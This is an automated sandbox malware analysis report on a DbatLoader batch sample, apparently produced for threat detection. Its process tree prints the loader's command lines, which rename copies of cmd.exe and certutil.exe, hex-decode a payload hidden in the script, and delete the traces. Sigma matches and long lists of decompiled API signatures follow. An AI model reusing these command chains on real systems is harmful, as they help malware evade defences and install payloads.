Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Xirnkxhvuzwepe.cmd

Overview

General Information

Sample name:Xirnkxhvuzwepe.cmd
Analysis ID:1483432
MD5:41152edeb64fe66b4bbd10372223d23a
SHA1:bc226681860e303393e335ce81aecb6d13d13d5b
SHA256:cec24e6d4ef5928960be72f7794ee5cbe7ab4df57bd080116434724dc2ff7ebc
Tags:cmdDbatLoader
Infos:

Detection

Score:72
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Drops PE files to the user root directory
Drops or copies certutil.exe with a different name (likely to bypass HIPS)
Drops or copies cmd.exe with a different name (likely to bypass HIPS)
Registers a new ROOT certificate
Sigma detected: Execution from Suspicious Folder
Sigma detected: Parent in Public Folder Suspicious Process
Binary contains a suspicious time stamp
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query locales information (e.g. system language)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Drops PE files to the user directory
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • cmd.exe (PID: 6692 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\Xirnkxhvuzwepe.cmd" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 5768 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • extrac32.exe (PID: 576 cmdline: C:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe "C:\\Users\\Public\\alpha.exe" MD5: 41330D97BF17D07CD4308264F3032547)
    • alpha.exe (PID: 3668 cmdline: C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • extrac32.exe (PID: 2964 cmdline: extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe MD5: 41330D97BF17D07CD4308264F3032547)
    • alpha.exe (PID: 5972 cmdline: C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\Xirnkxhvuzwepe.cmd" "C:\\Users\\Public\\CLEAN.GIF" 3 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • kn.exe (PID: 3032 cmdline: C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\Xirnkxhvuzwepe.cmd" "C:\\Users\\Public\\CLEAN.GIF" 3 MD5: F17616EC0522FC5633151F7CAA278CAA)
    • alpha.exe (PID: 1080 cmdline: C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\CLEAN.GIF" "C:\\Users\\Public\\Libraries\\CLEAN.COM" 10 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • kn.exe (PID: 5504 cmdline: C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\CLEAN.GIF" "C:\\Users\\Public\\Libraries\\CLEAN.COM" 10 MD5: F17616EC0522FC5633151F7CAA278CAA)
    • alpha.exe (PID: 3784 cmdline: C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\kn.exe" / A / F / Q / S MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • alpha.exe (PID: 744 cmdline: C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\CLEAN.GIF" / A / F / Q / S MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

System Summary

barindex
Sigma detected: Execution from Suspicious Folder
Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe, CommandLine: C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe, CommandLine|base64offset|contains: , Image: C:\Users\Public\alpha.exe, NewProcessName: C:\Users\Public\alpha.exe, OriginalFileName: C:\Users\Public\alpha.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\Xirnkxhvuzwepe.cmd" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6692, ParentProcessName: cmd.exe, ProcessCommandLine: C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe, ProcessId: 3668, ProcessName: alpha.exe
Sigma detected: Parent in Public Folder Suspicious Process
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe, CommandLine: extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe, CommandLine|base64offset|contains: {ki, Image: C:\Windows\System32\extrac32.exe, NewProcessName: C:\Windows\System32\extrac32.exe, OriginalFileName: C:\Windows\System32\extrac32.exe, ParentCommandLine: C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe, ParentImage: C:\Users\Public\alpha.exe, ParentProcessId: 3668, ParentProcessName: alpha.exe, ProcessCommandLine: extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe, ProcessId: 2964, ProcessName: extrac32.exe

Snort Signatures

No Snort rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Multi AV Scanner detection for submitted file
Source: Xirnkxhvuzwepe.cmdReversingLabs: Detection: 29%
Source: Xirnkxhvuzwepe.cmdVirustotal: Detection: 12%Perma Link
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD7A2F38 ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z,InitializeCriticalSection,?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z,LocalFree,lstrcmpW,#357,CoInitialize,#357,#357,?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z,?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z,RevertToSelf,#356,#357,LocalFree,NCryptFreeObject,CoUninitialize,DeleteCriticalSection,7_2_00007FF7FD7A2F38
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD7A2C2C CryptFindOIDInfo,memset,CryptRegisterOIDInfo,GetLastError,#357,7_2_00007FF7FD7A2C2C
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD7EDEA4 memset,GetSystemTimeAsFileTime,CryptGenRandom,GetLastError,LocalAlloc,GetLastError,#357,GetLastError,#357,LocalFree,LocalFree,LocalFree,LocalFree,CryptReleaseContext,CryptAcquireContextW,LocalFree,7_2_00007FF7FD7EDEA4
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD81DEB0 wcscspn,#357,GetFileAttributesW,GetLastError,#359,CertEnumCertificatesInStore,CertGetCRLContextProperty,CryptBinaryToStringW,wcsstr,CertEnumCertificatesInStore,GetLastError,GetLastError,LocalFree,LocalFree,CertCloseStore,CertFreeCertificateContext,7_2_00007FF7FD81DEB0
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD867EE8 CryptFindOIDInfo,#357,CryptInitOIDFunctionSet,CryptGetOIDFunctionAddress,GetLastError,GetLastError,GetLastError,#357,strcmp,GetLastError,strcmp,GetLastError,CryptFindOIDInfo,CryptFindOIDInfo,#357,LocalFree,LocalFree,CryptFreeOIDFunctionAddress,LocalFree,LocalFree,7_2_00007FF7FD867EE8
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD7E7F14 CryptAcquireCertificatePrivateKey,GetLastError,#357,CryptSetProvParam,GetLastError,GetSecurityDescriptorLength,#359,CryptReleaseContext,7_2_00007FF7FD7E7F14
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD825F04 #357,#357,SysAllocStringByteLen,#357,SysFreeString,#357,#359,#357,lstrcmpW,CryptMsgControl,GetLastError,#357,CertFreeCertificateContext,#359,CertFreeCTLContext,LocalFree,SysFreeString,LocalFree,7_2_00007FF7FD825F04
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD821E2C CryptAcquireContextW,GetLastError,#357,CryptGenKey,GetLastError,CryptDestroyKey,#357,GetLastError,#357,#357,LocalAlloc,#357,memmove,LocalFree,memset,CryptGenRandom,GetLastError,#357,GetSystemTime,SystemTimeToFileTime,GetLastError,CertCreateCertificateContext,GetLastError,CryptReleaseContext,LocalFree,LocalFree,LocalFree,7_2_00007FF7FD821E2C
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD895E3C CryptDecodeObjectEx,strcmp,strcmp,strcmp,7_2_00007FF7FD895E3C
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD85DE70 NCryptIsKeyHandle,#357,CryptExportKey,GetLastError,#358,LocalAlloc,#357,CryptExportKey,GetLastError,LocalFree,7_2_00007FF7FD85DE70
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD7C5DA1 #358,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,CryptMsgClose,CertFreeCTLContext,CertFreeCertificateContext,CertCloseStore,LocalFree,7_2_00007FF7FD7C5DA1
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD7A1DE8 GetSystemDefaultLangID,wcscspn,LocalFree,LocalFree,CryptEnumOIDInfo,qsort,free,7_2_00007FF7FD7A1DE8
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD7C5DF7 GetLastError,#357,#357,#358,#358,CertEnumCertificatesInStore,CertEnumCertificatesInStore,CertEnumCRLsInStore,CertEnumCRLsInStore,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,CryptMsgClose,CertFreeCTLContext,CertFreeCertificateContext,CertCloseStore,LocalFree,#357,7_2_00007FF7FD7C5DF7
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD85FD2C CryptDecryptMessage,GetLastError,#357,7_2_00007FF7FD85FD2C
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD84DD1C #357,strcmp,GetLastError,CryptHashCertificate,GetLastError,LocalAlloc,memmove,LocalFree,7_2_00007FF7FD84DD1C
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD867D3C #357,CryptFindOIDInfo,CryptFindOIDInfo,CryptFindOIDInfo,wcschr,CryptFindOIDInfo,#359,LocalFree,7_2_00007FF7FD867D3C
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD86BD3C NCryptIsKeyHandle,#357,#357,CryptSetProvParam,GetLastError,#357,CryptSetProvParam,GetLastError,LocalFree,7_2_00007FF7FD86BD3C
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD895D74 CryptDecodeObjectEx,strcmp,strcmp,7_2_00007FF7FD895D74
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD7F1D70 #357,LocalAlloc,memmove,#357,CryptSetKeyParam,GetLastError,LocalAlloc,memmove,CryptDecrypt,GetLastError,#357,#357,#358,LocalFree,LocalFree,#357,#357,#357,LocalFree,LocalFree,LocalFree,7_2_00007FF7FD7F1D70
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD813D60 #359,GetLastError,#357,CryptSetProvParam,GetLastError,#357,CryptSetProvParam,GetLastError,CryptReleaseContext,7_2_00007FF7FD813D60
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD7E9D6C #357,#357,#359,LocalAlloc,#357,#357,wcsrchr,LocalAlloc,memmove,CryptFindLocalizedName,wcsrchr,CryptFindLocalizedName,#357,GetLastError,#359,CertOpenStore,GetLastError,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,7_2_00007FF7FD7E9D6C
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD7EDD80 CertFindExtension,CryptDecodeObject,7_2_00007FF7FD7EDD80
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD845D80 #357,NCryptIsKeyHandle,GetSecurityDescriptorLength,CryptSetProvParam,GetLastError,LocalFree,#357,7_2_00007FF7FD845D80
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD7C60DA #357,#357,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,CryptMsgClose,CertFreeCTLContext,CertFreeCertificateContext,CertCloseStore,LocalFree,7_2_00007FF7FD7C60DA
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD85E044 NCryptIsKeyHandle,CryptGetProvParam,GetLastError,#357,LocalAlloc,#359,LocalFree,7_2_00007FF7FD85E044
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD804070 _wcsnicmp,_wcsnicmp,_wcsnicmp,#357,GetLastError,#359,#357,LocalAlloc,memmove,wcsstr,#223,#357,#359,LocalFree,#359,LocalFree,LocalFree,LocalFree,LocalFree,CryptMemFree,7_2_00007FF7FD804070
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD835FA8 NCryptIsKeyHandle,wcscmp,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,_CxxThrowException,7_2_00007FF7FD835FA8
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD895FF0 CryptDecodeObjectEx,CryptDecodeObjectEx,7_2_00007FF7FD895FF0
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD7C5FE8 #357,#357,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,CryptMsgClose,CertFreeCTLContext,CertFreeCertificateContext,CertCloseStore,LocalFree,7_2_00007FF7FD7C5FE8
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD895F20 CryptDecodeObjectEx,7_2_00007FF7FD895F20
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD805F54 GetLastError,LocalAlloc,memmove,wcschr,CryptFindOIDInfo,#357,#357,LocalFree,LocalFree,7_2_00007FF7FD805F54
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD7CFF64 NCryptGetProperty,#359,NCryptGetProperty,CertEnumCertificatesInStore,CertFindCertificateInStore,CertFreeCertificateContext,CertEnumCertificatesInStore,CertFreeCertificateContext,CertCloseStore,CertCloseStore,#357,7_2_00007FF7FD7CFF64
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD839F90 memmove,wcscmp,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,BCryptSignHash,#205,#357,#357,#357,#357,_CxxThrowException,_CxxThrowException,_CxxThrowException,#357,_CxxThrowException,_CxxThrowException,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,_CxxThrowException,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,_CxxThrowException,7_2_00007FF7FD839F90
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD895AA8 CryptDecodeObjectEx,7_2_00007FF7FD895AA8
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD7F3B14 NCryptIsKeyHandle,CryptGetUserKey,GetLastError,#357,#357,#357,NCryptIsKeyHandle,#357,#357,LocalFree,CryptDestroyKey,7_2_00007FF7FD7F3B14
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD829AF8 CertCloseStore,CertCloseStore,CryptMsgClose,LocalFree,LocalFree,NCryptFreeObject,7_2_00007FF7FD829AF8
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD7C3A40 LocalFree,LocalFree,strcmp,#357,strcmp,LocalFree,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,LocalFree,strcmp,CryptDecodeObject,strcmp,LocalFree,strcmp,GetLastError,#357,LocalFree,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,GetLastError,#357,strcmp,strcmp,GetLastError,strcmp,CryptDecodeObject,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,GetLastError,strcmp,strcmp,strcmp,strcmp,#357,#357,CryptDecodeObject,GetLastError,GetLastError,strcmp,LocalFree,strcmp,LocalFree,GetLastError,strcmp,GetLastError,LocalFree,LocalFree,LocalFree,LocalFree,7_2_00007FF7FD7C3A40
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD84BA50 CryptSignCertificate,SetLastError,7_2_00007FF7FD84BA50
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD831A44 CryptContextAddRef,_CxxThrowException,GetLastError,_CxxThrowException,GetLastError,_CxxThrowException,_CxxThrowException,7_2_00007FF7FD831A44
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD837A70 wcscmp,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,NCryptSignHash,#205,#357,#357,#357,#357,_CxxThrowException,_CxxThrowException,_CxxThrowException,#357,_CxxThrowException,_CxxThrowException,NCryptSecretAgreement,#205,#357,#357,_CxxThrowException,_CxxThrowException,GetLastError,_CxxThrowException,NCryptDeriveKey,#205,#359,#357,#357,_CxxThrowException,_CxxThrowException,_CxxThrowException,7_2_00007FF7FD837A70
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD849A58 #357,#357,#210,#357,SetWindowTextW,SetFocus,SendMessageW,SendMessageW,LocalAlloc,#357,#357,LocalFree,UpdateWindow,CoInitialize,LoadCursorW,SetCursor,LoadCursorW,SetCursor,SetFocus,SetWindowTextW,SetFocus,#357,SetFocus,SendMessageW,#357,LocalFree,LocalFree,LocalFree,CryptUIDlgFreeCAContext,CoUninitialize,7_2_00007FF7FD849A58
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD85FA84 LocalAlloc,#357,memmove,CryptDecrypt,GetLastError,#357,LocalFree,7_2_00007FF7FD85FA84
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD81B9CC I_CryptWalkAllLruCacheEntries,I_CryptFindLruEntry,I_CryptRemoveLruEntry,#357,I_CryptWalkAllLruCacheEntries,I_CryptFindLruEntry,I_CryptRemoveLruEntry,#357,7_2_00007FF7FD81B9CC
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD7BF9B8 strcmp,#357,#359,NCryptOpenStorageProvider,#357,NCryptImportKey,#357,NCryptSetProperty,NCryptFinalizeKey,NCryptFreeObject,NCryptFreeObject,#359,CryptImportPKCS8,GetLastError,#357,CryptGetUserKey,GetLastError,#357,CryptGetUserKey,GetLastError,CryptDestroyKey,CryptReleaseContext,LocalFree,7_2_00007FF7FD7BF9B8
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD86BA14 NCryptIsKeyHandle,#357,CryptGetProvParam,GetLastError,NCryptFreeObject,7_2_00007FF7FD86BA14
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD7B3918 #357,#357,#357,#357,CertFindExtension,CryptDecodeObject,GetLastError,#357,LocalFree,LocalFree,LocalFree,LocalFree,7_2_00007FF7FD7B3918
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD85F918 CryptEncrypt,GetLastError,LocalFree,LocalAlloc,#357,LocalFree,7_2_00007FF7FD85F918
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD83391C CryptVerifySignatureW,#205,GetLastError,#357,#359,#357,SetLastError,7_2_00007FF7FD83391C
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD7EF944 CryptDecodeObject,GetLastError,#357,7_2_00007FF7FD7EF944
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD81B950 I_CryptGetLruEntryData,#357,7_2_00007FF7FD81B950
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD859970 LocalAlloc,#357,LocalAlloc,CertGetEnhancedKeyUsage,GetLastError,#358,LocalFree,LocalFree,GetLastError,strcmp,#357,CryptFindOIDInfo,LocalFree,7_2_00007FF7FD859970
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD88B980 #357,CryptFindOIDInfo,#359,GetLastError,#357,#359,CryptGetProvParam,memset,CryptGetProvParam,CryptFindOIDInfo,#357,GetLastError,#357,CryptReleaseContext,BCryptFreeBuffer,7_2_00007FF7FD88B980
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD81597C GetLastError,CryptEncodeObjectEx,GetLastError,#357,7_2_00007FF7FD81597C
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD7C7988 CryptFindOIDInfo,#357,CryptFindOIDInfo,#357,GetLastError,#357,GetLastError,#357,LocalFree,7_2_00007FF7FD7C7988
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD825CE8 #357,CertOpenStore,GetLastError,CertFindCertificateInStore,GetLastError,#359,LocalFree,CertFreeCertificateContext,CertCloseStore,CryptVerifyCertificateSignature,GetLastError,#357,7_2_00007FF7FD825CE8
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD7CFC20 #359,#357,NCryptOpenStorageProvider,#357,NCryptImportKey,GetLastError,#357,#357,LocalFree,LocalFree,NCryptFreeObject,#357,NCryptFreeObject,#357,7_2_00007FF7FD7CFC20
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD7EFC34 memset,#357,CryptDecodeObject,GetLastError,LocalAlloc,#357,memmove,memset,GetLastError,#357,LocalFree,LocalFree,LocalFree,LocalFree,7_2_00007FF7FD7EFC34
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD895C54 CryptDecodeObjectEx,CryptDecodeObjectEx,7_2_00007FF7FD895C54
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD7D1C50 BCryptQueryProviderRegistration,#360,#357,BCryptFreeBuffer,7_2_00007FF7FD7D1C50
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD7E3C60 CryptExportPublicKeyInfo,GetLastError,#357,LocalAlloc,CryptExportPublicKeyInfo,GetLastError,#357,#359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,LocalAlloc,#359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,CertCreateCertificateContext,GetLastError,#357,#357,CertComparePublicKeyInfo,LocalAlloc,#359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,LocalAlloc,#359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,CertSetCTLContextProperty,GetLastError,#357,#357,#358,#358,#357,#357,#357,LocalFree,LocalFree,LocalFree,LocalFree,CertFreeCertificateContext,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,7_2_00007FF7FD7E3C60
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD821C84 GetLastError,#357,CryptVerifyCertificateSignature,GetLastError,#357,LocalFree,#357,LocalFree,7_2_00007FF7FD821C84
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD795BA4 #357,NCryptIsKeyHandle,strcmp,GetLastError,strcmp,GetLastError,SysAllocStringByteLen,#357,SysFreeString,#359,LocalAlloc,#357,GetLastError,GetLastError,GetLastError,#357,LocalFree,LocalFree,LocalFree,SysFreeString,CertFreeCertificateContext,LocalFree,LocalFree,CryptReleaseContext,7_2_00007FF7FD795BA4
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD7B9BC8 #357,strcmp,strcmp,CryptDecodeObject,strcmp,CryptDecodeObject,strcmp,strcmp,strcmp,CryptDecodeObject,strcmp,CryptDecodeObject,strcmp,CryptDecodeObject,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,CryptDecodeObject,GetLastError,strcmp,strcmp,strcmp,strcmp,GetLastError,strcmp,CryptDecodeObject,GetLastError,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,LocalFree,strcmp,SysFreeString,#357,#357,strcmp,SysFreeString,#357,SysFreeString,GetLastError,strcmp,LocalFree,LocalFree,CryptDecodeObject,strcmp,strcmp,strcmp,SysFreeString,LocalFree,7_2_00007FF7FD7B9BC8
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD83BBC0 wcscmp,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,GetLastError,_CxxThrowException,_CxxThrowException,GetLastError,_CxxThrowException,_CxxThrowException,CryptSignHashW,#205,GetLastError,#357,#359,#357,SetLastError,_CxxThrowException,_CxxThrowException,_CxxThrowException,GetLastError,_CxxThrowException,GetLastError,#357,_CxxThrowException,_CxxThrowException,_CxxThrowException,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,_CxxThrowException,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,_CxxThrowException,7_2_00007FF7FD83BBC0
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD833BEB _CxxThrowException,_CxxThrowException,_CxxThrowException,CryptExportKey,#205,GetLastError,#357,#357,#357,#357,SetLastError,_CxxThrowException,_CxxThrowException,GetLastError,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,7_2_00007FF7FD833BEB
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD83FB50 CryptExportPublicKeyInfo,GetLastError,#357,LocalAlloc,#357,CryptExportPublicKeyInfo,GetLastError,GetLastError,#357,#357,CertFindExtension,LocalAlloc,#357,memmove,#357,#357,#357,#357,#357,CAFindCertTypeByName,CAGetCertTypeExtensions,#357,#358,CertFindExtension,#357,LocalAlloc,memmove,memmove,#357,#357,GetLastError,#357,CertFindExtension,#357,GetLastError,#357,CryptSignAndEncodeCertificate,GetLastError,#357,LocalAlloc,CryptSignAndEncodeCertificate,GetLastError,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,CAFreeCertTypeExtensions,CACloseCertType,7_2_00007FF7FD83FB50
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD7FBB38 #357,CryptVerifyCertificateSignatureEx,GetLastError,#357,memcmp,GetSystemTimeAsFileTime,CompareFileTime,CompareFileTime,CompareFileTime,#357,#358,LocalFree,LocalFree,LocalFree,LocalFree,7_2_00007FF7FD7FBB38
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD86BB50 NCryptIsKeyHandle,#359,CertCreateCertificateContext,GetLastError,LocalFree,CryptGetKeyParam,GetLastError,#358,LocalAlloc,#357,CryptGetKeyParam,GetLastError,#357,7_2_00007FF7FD86BB50
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD865B44 CertFindExtension,#357,CryptDecodeObject,GetLastError,7_2_00007FF7FD865B44
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD867B60 GetLastError,#359,CryptGetProvParam,GetLastError,#357,CryptFindOIDInfo,LocalAlloc,#357,memmove,CryptReleaseContext,7_2_00007FF7FD867B60
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD895B90 CryptDecodeObjectEx,memmove,7_2_00007FF7FD895B90
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD7BBB80 #357,NCryptIsKeyHandle,#357,LocalFree,LocalFree,7_2_00007FF7FD7BBB80
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD85FB94 #357,CryptFindOIDInfo,LocalAlloc,CryptEncryptMessage,GetLastError,LocalFree,#357,7_2_00007FF7FD85FB94
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF7FD7E76B0 #359,CryptAcquireCertificatePrivateKey,GetLastError,#357,#358,#359,#358,#358,LocalFree,LocalFree,#357,CryptFindCertificateKeyProvInfo,GetLastError,#357,LocalFree,LocalFree,CryptReleaseContext,7_2_00007FF7FD7E76B0
